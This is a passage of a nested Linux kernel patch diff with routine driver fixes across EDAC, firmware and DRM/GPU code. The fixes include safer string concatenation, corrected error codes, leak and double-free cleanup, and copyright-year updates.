+@@ -1217,7 +1217,7 @@ static irqreturn_t thunderx_ocx_lnk_threaded_isr(int irq, void *irq_id)
+ 		decode_register(other, OCX_OTHER_SIZE,
+ 				ocx_com_link_errors, ctx->reg_com_link_int);
+ 
+-		strncat(msg, other, OCX_MESSAGE_SIZE);
++		strlcat(msg, other, OCX_MESSAGE_SIZE);
+ 
+ 		if (ctx->reg_com_link_int & OCX_COM_LINK_INT_UE)
+ 			edac_device_handle_ue(ocx->edac_dev, 0, 0, msg);
+@@ -1896,7 +1896,7 @@ static irqreturn_t thunderx_l2c_threaded_isr(int irq, void *irq_id)
+ 
+ 		decode_register(other, L2C_OTHER_SIZE, l2_errors, ctx->reg_int);
+ 
+-		strncat(msg, other, L2C_MESSAGE_SIZE);
++		strlcat(msg, other, L2C_MESSAGE_SIZE);
+ 
+ 		if (ctx->reg_int & mask_ue)
+ 			edac_device_handle_ue(l2c->edac_dev, 0, 0, msg);
+diff --git a/drivers/firmware/meson/meson_sm.c b/drivers/firmware/meson/meson_sm.c
+index d081a6312627b..bf19dd66c2137 100644
+--- a/drivers/firmware/meson/meson_sm.c
++++ b/drivers/firmware/meson/meson_sm.c
+@@ -313,11 +313,14 @@ static int __init meson_sm_probe(struct platform_device *pdev)
+ 
+ 	platform_set_drvdata(pdev, fw);
+ 
+-	pr_info("secure-monitor enabled\n");
++	if (devm_of_platform_populate(dev))
++		goto out_in_base;
+ 
+ 	if (sysfs_create_group(&pdev->dev.kobj, &meson_sm_sysfs_attr_group))
+ 		goto out_in_base;
+ 
++	pr_info("secure-monitor enabled\n");
++
+ 	return 0;
+ 
+ out_in_base:
+diff --git a/drivers/firmware/ti_sci.c b/drivers/firmware/ti_sci.c
+index 597d1a367d96d..6231c98ba291a 100644
+--- a/drivers/firmware/ti_sci.c
++++ b/drivers/firmware/ti_sci.c
+@@ -161,7 +161,7 @@ static int ti_sci_debugfs_create(struct platform_device *pdev,
+ {
+ 	struct device *dev = &pdev->dev;
+ 	struct resource *res;
+-	char debug_name[50] = "ti_sci_debug@";
++	char debug_name[50];
+ 
+ 	/* Debug region is optional */
+ 	res = platform_get_resource_byname(pdev, IORESOURCE_MEM,
+@@ -178,10 +178,10 @@ static int ti_sci_debugfs_create(struct platform_device *pdev,
+ 	/* Setup NULL termination */
+ 	info->debug_buffer[info->debug_region_size] = 0;
+ 
+-	info->d = debugfs_create_file(strncat(debug_name, dev_name(dev),
+-					      sizeof(debug_name) -
+-					      sizeof("ti_sci_debug@")),
+-				      0444, NULL, info, &ti_sci_debug_fops);
++	snprintf(debug_name, sizeof(debug_name), "ti_sci_debug@%s",
++		 dev_name(dev));
++	info->d = debugfs_create_file(debug_name, 0444, NULL, info,
++				      &ti_sci_debug_fops);
+ 	if (IS_ERR(info->d))
+ 		return PTR_ERR(info->d);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
+index 8123feb1a1161..06ab6066da61a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
+@@ -596,7 +596,7 @@ static ssize_t amdgpu_debugfs_regs_smc_read(struct file *f, char __user *buf,
+ 	int r;
+ 
+ 	if (!adev->smc_rreg)
+-		return -EPERM;
++		return -EOPNOTSUPP;
+ 
+ 	if (size & 0x3 || *pos & 0x3)
+ 		return -EINVAL;
+@@ -655,7 +655,7 @@ static ssize_t amdgpu_debugfs_regs_smc_write(struct file *f, const char __user *
+ 	int r;
+ 
+ 	if (!adev->smc_wreg)
+-		return -EPERM;
++		return -EOPNOTSUPP;
+ 
+ 	if (size & 0x3 || *pos & 0x3)
+ 		return -EINVAL;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index b9983ca99eb7d..a8e1f2cfe12dc 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2202,6 +2202,8 @@ retry_init:
+ 
+ 		pci_wake_from_d3(pdev, TRUE);
+ 
++		pci_wake_from_d3(pdev, TRUE);
++
+ 		/*
+ 		 * For runpm implemented via BACO, PMFW will handle the
+ 		 * timing for BACO in and out:
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c b/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
+index 88bf6221d4bef..8a7705db0b9a6 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
+@@ -1019,7 +1019,7 @@ int svm_migrate_init(struct amdgpu_device *adev)
+ 	} else {
+ 		res = devm_request_free_mem_region(adev->dev, &iomem_resource, size);
+ 		if (IS_ERR(res))
+-			return -ENOMEM;
++			return PTR_ERR(res);
+ 		pgmap->range.start = res->start;
+ 		pgmap->range.end = res->end;
+ 		pgmap->type = MEMORY_DEVICE_PRIVATE;
+@@ -1035,11 +1035,10 @@ int svm_migrate_init(struct amdgpu_device *adev)
+ 	r = devm_memremap_pages(adev->dev, pgmap);
+ 	if (IS_ERR(r)) {
+ 		pr_err("failed to register HMM device memory\n");
++		if (pgmap->type == MEMORY_DEVICE_PRIVATE)
++			devm_release_mem_region(adev->dev, res->start, resource_size(res));
+ 		/* Disable SVM support capability */
+ 		pgmap->type = 0;
+-		if (pgmap->type == MEMORY_DEVICE_PRIVATE)
+-			devm_release_mem_region(adev->dev, res->start,
+-						res->end - res->start + 1);
+ 		return PTR_ERR(r);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+index 713f893d25302..705d9e91b5aa3 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+@@ -1403,10 +1403,11 @@ static int kfd_create_indirect_link_prop(struct kfd_topology_device *kdev, int g
+ 		num_cpu++;
+ 	}
+ 
++	if (list_empty(&kdev->io_link_props))
++		return -ENODATA;
++
+ 	gpu_link = list_first_entry(&kdev->io_link_props,
+-					struct kfd_iolink_properties, list);
+-	if (!gpu_link)
+-		return -ENOMEM;
++				    struct kfd_iolink_properties, list);
+ 
+ 	for (i = 0; i < num_cpu; i++) {
+ 		/* CPU <--> GPU */
+@@ -1484,15 +1485,17 @@ static int kfd_add_peer_prop(struct kfd_topology_device *kdev,
+ 				peer->gpu->adev))
+ 		return ret;
+ 
++	if (list_empty(&kdev->io_link_props))
++		return -ENODATA;
++
+ 	iolink1 = list_first_entry(&kdev->io_link_props,
+-							struct kfd_iolink_properties, list);
+-	if (!iolink1)
+-		return -ENOMEM;
++				   struct kfd_iolink_properties, list);
++
++	if (list_empty(&peer->io_link_props))
++		return -ENODATA;
+ 
+ 	iolink2 = list_first_entry(&peer->io_link_props,
+-							struct kfd_iolink_properties, list);
+-	if (!iolink2)
+-		return -ENOMEM;
++				   struct kfd_iolink_properties, list);
+ 
+ 	props = kfd_alloc_struct(props);
+ 	if (!props)
+diff --git a/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c b/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c
+index f5e08b60f66ef..d17bfa111aa74 100644
+--- a/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c
++++ b/drivers/gpu/drm/amd/pm/legacy-dpm/kv_dpm.c
+@@ -2748,10 +2748,8 @@ static int kv_parse_power_table(struct amdgpu_device *adev)
+ 		non_clock_info = (struct _ATOM_PPLIB_NONCLOCK_INFO *)
+ 			&non_clock_info_array->nonClockInfo[non_clock_array_index];
+ 		ps = kzalloc(sizeof(struct kv_ps), GFP_KERNEL);
+-		if (ps == NULL) {
+-			kfree(adev->pm.dpm.ps);
++		if (ps == NULL)
+ 			return -ENOMEM;
+-		}
+ 		adev->pm.dpm.ps[i].ps_priv = ps;
+ 		k = 0;
+ 		idx = (u8 *)&power_state->v2.clockInfoIndex[0];
+diff --git a/drivers/gpu/drm/amd/pm/legacy-dpm/legacy_dpm.c b/drivers/gpu/drm/amd/pm/legacy-dpm/legacy_dpm.c
+index d3fe149d84765..291223ea7ba7d 100644
+--- a/drivers/gpu/drm/amd/pm/legacy-dpm/legacy_dpm.c
++++ b/drivers/gpu/drm/amd/pm/legacy-dpm/legacy_dpm.c
+@@ -272,10 +272,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				 le16_to_cpu(power_info->pplib4.usVddcDependencyOnSCLKOffset));
+ 			ret = amdgpu_parse_clk_voltage_dep_table(&adev->pm.dpm.dyn_state.vddc_dependency_on_sclk,
+ 								 dep_table);
+-			if (ret) {
+-				amdgpu_free_extended_power_table(adev);
++			if (ret)
+ 				return ret;
+-			}
+ 		}
+ 		if (power_info->pplib4.usVddciDependencyOnMCLKOffset) {
+ 			dep_table = (ATOM_PPLIB_Clock_Voltage_Dependency_Table *)
+@@ -283,10 +281,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				 le16_to_cpu(power_info->pplib4.usVddciDependencyOnMCLKOffset));
+ 			ret = amdgpu_parse_clk_voltage_dep_table(&adev->pm.dpm.dyn_state.vddci_dependency_on_mclk,
+ 								 dep_table);
+-			if (ret) {
+-				amdgpu_free_extended_power_table(adev);
++			if (ret)
+ 				return ret;
+-			}
+ 		}
+ 		if (power_info->pplib4.usVddcDependencyOnMCLKOffset) {
+ 			dep_table = (ATOM_PPLIB_Clock_Voltage_Dependency_Table *)
+@@ -294,10 +290,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				 le16_to_cpu(power_info->pplib4.usVddcDependencyOnMCLKOffset));
+ 			ret = amdgpu_parse_clk_voltage_dep_table(&adev->pm.dpm.dyn_state.vddc_dependency_on_mclk,
+ 								 dep_table);
+-			if (ret) {
+-				amdgpu_free_extended_power_table(adev);
++			if (ret)
+ 				return ret;
+-			}
+ 		}
+ 		if (power_info->pplib4.usMvddDependencyOnMCLKOffset) {
+ 			dep_table = (ATOM_PPLIB_Clock_Voltage_Dependency_Table *)
+@@ -305,10 +299,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				 le16_to_cpu(power_info->pplib4.usMvddDependencyOnMCLKOffset));
+ 			ret = amdgpu_parse_clk_voltage_dep_table(&adev->pm.dpm.dyn_state.mvdd_dependency_on_mclk,
+ 								 dep_table);
+-			if (ret) {
+-				amdgpu_free_extended_power_table(adev);
++			if (ret)
+ 				return ret;
+-			}
+ 		}
+ 		if (power_info->pplib4.usMaxClockVoltageOnDCOffset) {
+ 			ATOM_PPLIB_Clock_Voltage_Limit_Table *clk_v =
+@@ -339,10 +331,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				kcalloc(psl->ucNumEntries,
+ 					sizeof(struct amdgpu_phase_shedding_limits_entry),
+ 					GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.phase_shedding_limits_table.entries) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.phase_shedding_limits_table.entries)
+ 				return -ENOMEM;
+-			}
+ 
+ 			entry = &psl->entries[0];
+ 			for (i = 0; i < psl->ucNumEntries; i++) {
+@@ -383,10 +373,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 			ATOM_PPLIB_CAC_Leakage_Record *entry;
+ 			u32 size = cac_table->ucNumEntries * sizeof(struct amdgpu_cac_leakage_table);
+ 			adev->pm.dpm.dyn_state.cac_leakage_table.entries = kzalloc(size, GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.cac_leakage_table.entries) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.cac_leakage_table.entries)
+ 				return -ENOMEM;
+-			}
+ 			entry = &cac_table->entries[0];
+ 			for (i = 0; i < cac_table->ucNumEntries; i++) {
+ 				if (adev->pm.dpm.platform_caps & ATOM_PP_PLATFORM_CAP_EVV) {
+@@ -438,10 +426,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				sizeof(struct amdgpu_vce_clock_voltage_dependency_entry);
+ 			adev->pm.dpm.dyn_state.vce_clock_voltage_dependency_table.entries =
+ 				kzalloc(size, GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.vce_clock_voltage_dependency_table.entries) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.vce_clock_voltage_dependency_table.entries)
+ 				return -ENOMEM;
+-			}
+ 			adev->pm.dpm.dyn_state.vce_clock_voltage_dependency_table.count =
+ 				limits->numEntries;
+ 			entry = &limits->entries[0];
+@@ -493,10 +479,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				sizeof(struct amdgpu_uvd_clock_voltage_dependency_entry);
+ 			adev->pm.dpm.dyn_state.uvd_clock_voltage_dependency_table.entries =
+ 				kzalloc(size, GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.uvd_clock_voltage_dependency_table.entries) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.uvd_clock_voltage_dependency_table.entries)
+ 				return -ENOMEM;
+-			}
+ 			adev->pm.dpm.dyn_state.uvd_clock_voltage_dependency_table.count =
+ 				limits->numEntries;
+ 			entry = &limits->entries[0];
+@@ -525,10 +509,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				sizeof(struct amdgpu_clock_voltage_dependency_entry);
+ 			adev->pm.dpm.dyn_state.samu_clock_voltage_dependency_table.entries =
+ 				kzalloc(size, GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.samu_clock_voltage_dependency_table.entries) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.samu_clock_voltage_dependency_table.entries)
+ 				return -ENOMEM;
+-			}
+ 			adev->pm.dpm.dyn_state.samu_clock_voltage_dependency_table.count =
+ 				limits->numEntries;
+ 			entry = &limits->entries[0];
+@@ -548,10 +530,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				 le16_to_cpu(ext_hdr->usPPMTableOffset));
+ 			adev->pm.dpm.dyn_state.ppm_table =
+ 				kzalloc(sizeof(struct amdgpu_ppm_table), GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.ppm_table) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.ppm_table)
+ 				return -ENOMEM;
+-			}
+ 			adev->pm.dpm.dyn_state.ppm_table->ppm_design = ppm->ucPpmDesign;
+ 			adev->pm.dpm.dyn_state.ppm_table->cpu_core_number =
+ 				le16_to_cpu(ppm->usCpuCoreNumber);
+@@ -583,10 +563,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 				sizeof(struct amdgpu_clock_voltage_dependency_entry);
+ 			adev->pm.dpm.dyn_state.acp_clock_voltage_dependency_table.entries =
+ 				kzalloc(size, GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.acp_clock_voltage_dependency_table.entries) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.acp_clock_voltage_dependency_table.entries)
+ 				return -ENOMEM;
+-			}
+ 			adev->pm.dpm.dyn_state.acp_clock_voltage_dependency_table.count =
+ 				limits->numEntries;
+ 			entry = &limits->entries[0];
+@@ -606,10 +584,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 			ATOM_PowerTune_Table *pt;
+ 			adev->pm.dpm.dyn_state.cac_tdp_table =
+ 				kzalloc(sizeof(struct amdgpu_cac_tdp_table), GFP_KERNEL);
+-			if (!adev->pm.dpm.dyn_state.cac_tdp_table) {
+-				amdgpu_free_extended_power_table(adev);
++			if (!adev->pm.dpm.dyn_state.cac_tdp_table)
+ 				return -ENOMEM;
+-			}
+ 			if (rev > 0) {
+ 				ATOM_PPLIB_POWERTUNE_Table_V1 *ppt = (ATOM_PPLIB_POWERTUNE_Table_V1 *)
+ 					(mode_info->atom_context->bios + data_offset +
+@@ -645,10 +621,8 @@ int amdgpu_parse_extended_power_table(struct amdgpu_device *adev)
+ 			ret = amdgpu_parse_clk_voltage_dep_table(
+ 					&adev->pm.dpm.dyn_state.vddgfx_dependency_on_sclk,
+ 					dep_table);
+-			if (ret) {
+-				kfree(adev->pm.dpm.dyn_state.vddgfx_dependency_on_sclk.entries);
++			if (ret)
+ 				return ret;
+-			}
+ 		}
+ 	}
+ 
+diff --git a/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c b/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
+index c89cfef7cafa1..dc0a6fba7050f 100644
+--- a/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
++++ b/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
+@@ -7379,10 +7379,9 @@ static int si_dpm_init(struct amdgpu_device *adev)
+ 		kcalloc(4,
+ 			sizeof(struct amdgpu_clock_voltage_dependency_entry),
+ 			GFP_KERNEL);
+-	if (!adev->pm.dpm.dyn_state.vddc_dependency_on_dispclk.entries) {
+-		amdgpu_free_extended_power_table(adev);
++	if (!adev->pm.dpm.dyn_state.vddc_dependency_on_dispclk.entries)
+ 		return -ENOMEM;
+-	}
++
+ 	adev->pm.dpm.dyn_state.vddc_dependency_on_dispclk.count = 4;
+ 	adev->pm.dpm.dyn_state.vddc_dependency_on_dispclk.entries[0].clk = 0;
+ 	adev->pm.dpm.dyn_state.vddc_dependency_on_dispclk.entries[0].v = 0;
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+index a31a62a1ce0b2..5e9410117712c 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+@@ -2987,6 +2987,8 @@ static int smu7_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ 		result = smu7_get_evv_voltages(hwmgr);
+ 		if (result) {
+ 			pr_info("Get EVV Voltage Failed.  Abort Driver loading!\n");
++			kfree(hwmgr->backend);
++			hwmgr->backend = NULL;
+ 			return -EINVAL;
+ 		}
+ 	} else {
+@@ -3032,8 +3034,10 @@ static int smu7_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ 	}
+ 
+ 	result = smu7_update_edc_leakage_table(hwmgr);
+-	if (result)
++	if (result) {
++		smu7_hwmgr_backend_fini(hwmgr);
+ 		return result;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-hdcp.c b/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-hdcp.c
+index 946212a955981..5e3b8edcf7948 100644
+--- a/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-hdcp.c
++++ b/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-hdcp.c
+@@ -403,7 +403,8 @@ static int _cdns_mhdp_hdcp_disable(struct cdns_mhdp_device *mhdp)
+ 
+ static int _cdns_mhdp_hdcp_enable(struct cdns_mhdp_device *mhdp, u8 content_type)
+ {
+-	int ret, tries = 3;
++	int ret = -EINVAL;
++	int tries = 3;
+ 	u32 i;
+ 
+ 	for (i = 0; i < tries; i++) {
+diff --git a/drivers/gpu/drm/bridge/tc358767.c b/drivers/gpu/drm/bridge/tc358767.c
+index 7ef78283e3d3e..926ab5c3c31ab 100644
+--- a/drivers/gpu/drm/bridge/tc358767.c
++++ b/drivers/gpu/drm/bridge/tc358767.c
+@@ -2097,7 +2097,7 @@ static int tc_probe(struct i2c_client *client, const struct i2c_device_id *id)
+ 	} else {
+ 		if (tc->hpd_pin < 0 || tc->hpd_pin > 1) {
+ 			dev_err(dev, "failed to parse HPD number\n");
+-			return ret;
++			return -EINVAL;
+ 		}
+ 	}
+ 
+diff --git a/drivers/gpu/drm/bridge/ti-tpd12s015.c b/drivers/gpu/drm/bridge/ti-tpd12s015.c
+index e0e015243a602..b588fea12502d 100644
+--- a/drivers/gpu/drm/bridge/ti-tpd12s015.c
++++ b/drivers/gpu/drm/bridge/ti-tpd12s015.c
+@@ -179,7 +179,7 @@ static int tpd12s015_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int __exit tpd12s015_remove(struct platform_device *pdev)
++static int tpd12s015_remove(struct platform_device *pdev)
+ {
+ 	struct tpd12s015_device *tpd = platform_get_drvdata(pdev);
+ 
+@@ -197,7 +197,7 @@ MODULE_DEVICE_TABLE(of, tpd12s015_of_match);
+ 
+ static struct platform_driver tpd12s015_driver = {
+ 	.probe	= tpd12s015_probe,
+-	.remove	= __exit_p(tpd12s015_remove),
++	.remove = tpd12s015_remove,
+ 	.driver	= {
+ 		.name	= "tpd12s015",
+ 		.of_match_table = tpd12s015_of_match,
+diff --git a/drivers/gpu/drm/drm_drv.c b/drivers/gpu/drm/drm_drv.c
+index 203bf8d6c34c4..d41a5eaa3e892 100644
+--- a/drivers/gpu/drm/drm_drv.c
++++ b/drivers/gpu/drm/drm_drv.c
+@@ -895,8 +895,11 @@ int drm_dev_register(struct drm_device *dev, unsigned long flags)
+ 			goto err_minors;
+ 	}
+ 
+-	if (drm_core_check_feature(dev, DRIVER_MODESET))
+-		drm_modeset_register_all(dev);
++	if (drm_core_check_feature(dev, DRIVER_MODESET)) {
++		ret = drm_modeset_register_all(dev);
++		if (ret)
++			goto err_unload;
++	}
+ 
+ 	DRM_INFO("Initialized %s %d.%d.%d %s for %s on minor %d\n",
+ 		 driver->name, driver->major, driver->minor,
+@@ -906,6 +909,9 @@ int drm_dev_register(struct drm_device *dev, unsigned long flags)
+ 
+ 	goto out_unlock;
+ 
++err_unload:
++	if (dev->driver->unload)
++		dev->driver->unload(dev);
+ err_minors:
+ 	remove_compat_control_link(dev);
+ 	drm_minor_unregister(dev, DRM_MINOR_PRIMARY);
+diff --git a/drivers/gpu/drm/mediatek/mtk_disp_merge.c b/drivers/gpu/drm/mediatek/mtk_disp_merge.c
+index 6428b6203ffe8..211140e87568d 100644
+--- a/drivers/gpu/drm/mediatek/mtk_disp_merge.c
++++ b/drivers/gpu/drm/mediatek/mtk_disp_merge.c
+@@ -104,7 +104,7 @@ void mtk_merge_stop_cmdq(struct device *dev, struct cmdq_pkt *cmdq_pkt)
+ 	mtk_ddp_write(cmdq_pkt, 0, &priv->cmdq_reg, priv->regs,
+ 		      DISP_REG_MERGE_CTRL);
+ 
+-	if (priv->async_clk)
++	if (!cmdq_pkt && priv->async_clk)
+ 		reset_control_reset(priv->reset_ctl);
+ }
+ 
+diff --git a/drivers/gpu/drm/mediatek/mtk_dp.c b/drivers/gpu/drm/mediatek/mtk_dp.c
+index 2c850b6d945bc..519e23a2a017c 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dp.c
++++ b/drivers/gpu/drm/mediatek/mtk_dp.c
+@@ -2669,3 +2669,4 @@ MODULE_AUTHOR("Markus Schneider-Pargmann <msp@baylibre.com>");
+ MODULE_AUTHOR("Bo-Chen Chen <rex-bc.chen@mediatek.com>");
+ MODULE_DESCRIPTION("MediaTek DisplayPort Driver");
+ MODULE_LICENSE("GPL");
++MODULE_SOFTDEP("pre: phy_mtk_dp");
+diff --git a/drivers/gpu/drm/mediatek/mtk_mdp_rdma.c b/drivers/gpu/drm/mediatek/mtk_mdp_rdma.c
+index eecfa98ff52e8..b288bb6eeecc7 100644
+--- a/drivers/gpu/drm/mediatek/mtk_mdp_rdma.c
++++ b/drivers/gpu/drm/mediatek/mtk_mdp_rdma.c
+@@ -223,8 +223,7 @@ int mtk_mdp_rdma_clk_enable(struct device *dev)
+ {
+ 	struct mtk_mdp_rdma *rdma = dev_get_drvdata(dev);
+ 
+-	clk_prepare_enable(rdma->clk);
+-	return 0;
++	return clk_prepare_enable(rdma->clk);
+ }
+ 
+ void mtk_mdp_rdma_clk_disable(struct device *dev)
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+index 6c0ffe8e4adbd..5a5821e59dc15 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ /*
+- * Copyright (c) 2022 Qualcomm Innovation Center, Inc. All rights reserved.
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  * Copyright (c) 2014-2021 The Linux Foundation. All rights reserved.
+  * Copyright (C) 2013 Red Hat
+  * Author: Rob Clark <robdclark@gmail.com>
+@@ -124,7 +124,7 @@ static void dpu_crtc_setup_lm_misr(struct dpu_crtc_state *crtc_state)
+ 			continue;
+ 
+ 		/* Calculate MISR over 1 frame */
+-		m->hw_lm->ops.setup_misr(m->hw_lm, true, 1);
++		m->hw_lm->ops.setup_misr(m->hw_lm);
+ 	}
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+index 547f9f2b9fcb5..b0eb881f8af13 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+@@ -2,7 +2,7 @@
+ /*
+  * Copyright (C) 2013 Red Hat
+  * Copyright (c) 2014-2018, 2020-2021 The Linux Foundation. All rights reserved.
+- * Copyright (c) 2022 Qualcomm Innovation Center, Inc. All rights reserved.
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  *
+  * Author: Rob Clark <robdclark@gmail.com>
+  */
+@@ -257,7 +257,7 @@ void dpu_encoder_setup_misr(const struct drm_encoder *drm_enc)
+ 		if (!phys->hw_intf || !phys->hw_intf->ops.setup_misr)
+ 			continue;
+ 
+-		phys->hw_intf->ops.setup_misr(phys->hw_intf, true, 1);
++		phys->hw_intf->ops.setup_misr(phys->hw_intf);
+ 	}
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+index b9dddf576c029..384558d2f9602 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ /*
+- * Copyright (c) 2022 Qualcomm Innovation Center, Inc. All rights reserved.
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  * Copyright (c) 2015-2018, The Linux Foundation. All rights reserved.
+  */
+ 
+@@ -322,9 +322,9 @@ static u32 dpu_hw_intf_get_line_count(struct dpu_hw_intf *intf)
+ 	return DPU_REG_READ(c, INTF_LINE_COUNT);
+ }
+ 
+-static void dpu_hw_intf_setup_misr(struct dpu_hw_intf *intf, bool enable, u32 frame_count)
++static void dpu_hw_intf_setup_misr(struct dpu_hw_intf *intf)
+ {
+-	dpu_hw_setup_misr(&intf->hw, INTF_MISR_CTRL, enable, frame_count);
++	dpu_hw_setup_misr(&intf->hw, INTF_MISR_CTRL, 0x1);
+ }
+ 
+ static int dpu_hw_intf_collect_misr(struct dpu_hw_intf *intf, u32 *misr_value)
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h
+index 643dd10bc0306..e75339b96a1d2 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h
+@@ -1,6 +1,6 @@
+ /* SPDX-License-Identifier: GPL-2.0-only */
+ /*
+- * Copyright (c) 2022 Qualcomm Innovation Center, Inc. All rights reserved.
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  * Copyright (c) 2015-2018, The Linux Foundation. All rights reserved.
+  */
+ 
+@@ -80,7 +80,7 @@ struct dpu_hw_intf_ops {
+ 	void (*bind_pingpong_blk)(struct dpu_hw_intf *intf,
+ 			bool enable,
+ 			const enum dpu_pingpong pp);
+-	void (*setup_misr)(struct dpu_hw_intf *intf, bool enable, u32 frame_count);
++	void (*setup_misr)(struct dpu_hw_intf *intf);
+ 	int (*collect_misr)(struct dpu_hw_intf *intf, u32 *misr_value);
+ };
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.c
+index f5120ea91edee..cc04fb979fb5c 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ /*
+- * Copyright (c) 2022 Qualcomm Innovation Center, Inc. All rights reserved.
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  * Copyright (c) 2015-2021, The Linux Foundation. All rights reserved.
+  */
+ 
+@@ -99,9 +99,9 @@ static void dpu_hw_lm_setup_border_color(struct dpu_hw_mixer *ctx,
+ 	}
+ }
+ 
